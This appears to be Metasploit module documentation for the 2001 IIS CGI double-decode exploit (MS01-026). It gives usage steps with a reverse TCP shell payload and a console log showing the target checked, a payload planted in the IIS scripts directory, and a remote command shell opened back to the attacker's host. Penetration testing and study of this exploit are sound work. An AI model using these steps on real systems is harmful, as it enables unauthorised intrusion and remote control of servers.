## Vulnerable Application

This module will execute an arbitrary payload on a Microsoft IIS installation
that is vulnerable to the CGI double-decode vulnerability of 2001.

This module has been tested successfully on:

* Windows 2000 Professional (SP0) (EN)
* Windows 2000 Professional (SP1) (AR)
* Windows 2000 Professional (SP1) (CZ)
* Windows 2000 Server (SP0) (FR)
* Windows 2000 Server (SP1) (EN)
* Windows 2000 Server (SP1) (SE)

Note: This module will leave a Metasploit payload in the IIS scripts directory.

## Verification Steps

1. `use exploit/windows/iis/ms01_026_dbldecode`
1. `set RHOSTS [IP]`
1. `set PAYLOAD windows/shell/reverse_tcp`
1. `set LHOST [IP]`
1. `run`

## Options

### WINDIR

The Windows directory name of the target host.
The directory name will be detected automatically if not set.

### DEPTH

Traversal depth to reach the drive root (default: `2`)

## Scenarios

### Windows 2000 Server (SP0) (FR)

```
msf6 > use exploit/windows/iis/ms01_026_dbldecode
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/iis/ms01_026_dbldecode) > set rhosts 192.168.200.175
rhosts => 192.168.200.175
msf6 exploit(windows/iis/ms01_026_dbldecode) > check
[+] 192.168.200.175:80 - The target is vulnerable. Found Windows directory name: winnt
msf6 exploit(windows/iis/ms01_026_dbldecode) > set lhost 192.168.200.130
lhost => 192.168.200.130
msf6 exploit(windows/iis/ms01_026_dbldecode) > run

[*] Started reverse TCP handler on 192.168.200.130:4444
[*] Using Windows directory "winnt"
[*] Copying "\winnt\system32\cmd.exe" to the IIS scripts directory as "EcFJ.exe"...
[*] Command Stager progress -  66.67% done (40/60 bytes)
[*] Command Stager progress - 100.00% done (60/60 bytes)
[*] Triggering payload "qQErEZeB.exe" via a direct request...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.200.175
[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.175:1090) at 2022-06-28 08:34:32 -0400
[!] This exploit may require manual cleanup of 'qQErEZeB.exe' on the target


Shell Banner:
Microsoft Windows 2000 [Version 5.00.2195]
-----
          

c:\inetpub\scripts>hostname
hostname
win2k-srv-fr
```